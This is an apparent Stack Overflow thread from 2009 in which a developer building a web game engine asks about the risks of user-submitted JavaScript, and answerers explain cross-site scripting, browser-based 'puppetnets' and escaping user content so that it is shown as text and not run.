I'm considering allowing users to input JavaScript in web pages and letting them share those pages with other users. What's the worst that can happen? Is there any way I can make it 'safe'?
views:
60answers:
4
+1
A:
It depends. If you place the JavaScript in a text box, it is just text, you can share text, we do that here. If you put the mechanics in to store the text into a .js file and automatically attached those to a page, you might have severe problems. More explaination might be good here.
Mark Schultheiss
2009-06-25 17:58:35
Nah, I'm making a web-based game engine.
Skofo
2009-06-25 18:03:59
+4
A:
As mentioned by others, if the javascript is only displayed to other users and not run, it would be perfectly safe (not taking into users manually running the code of course).
If, however, the code is run, then some bad things can happen. One pretty bad thing that can happen is that your site is used to form a so called puppetnet. Puppetnets are similar to botnets but utilize browsers instead, and single puppets may therefore be relatively shortlived (which distinguishes puppetnets from botnets). Puppetnets can be used for distributed denial of service attacks, worm propagation, spamming and more.
More about puppetnets can be found at http://www.cs.ucsd.edu/groups/sysnet/miscpapers/puppetnets-ccs06.pdf.
Mikael Auno
2009-06-25 18:06:11
+4
A:
What can happen has a name - Cross Site Scripting. Basically, you are allowing a (malicious) user Mallory to run a piece of code in the context of another (victimized) user Alice.
Here's a paper for preventing that from happening in ASP.Net.
If you want to share the content, not the behavior, of those js snippets, that's another story. In that case, you should make sure that, when sending the response to Alice containing code posted by Mallory, it is appropriately enclosed as a text NOT to be parsed and executed.
Here's is another paper that goes through the many twists this issue has.
Ariel
2009-06-25 18:08:26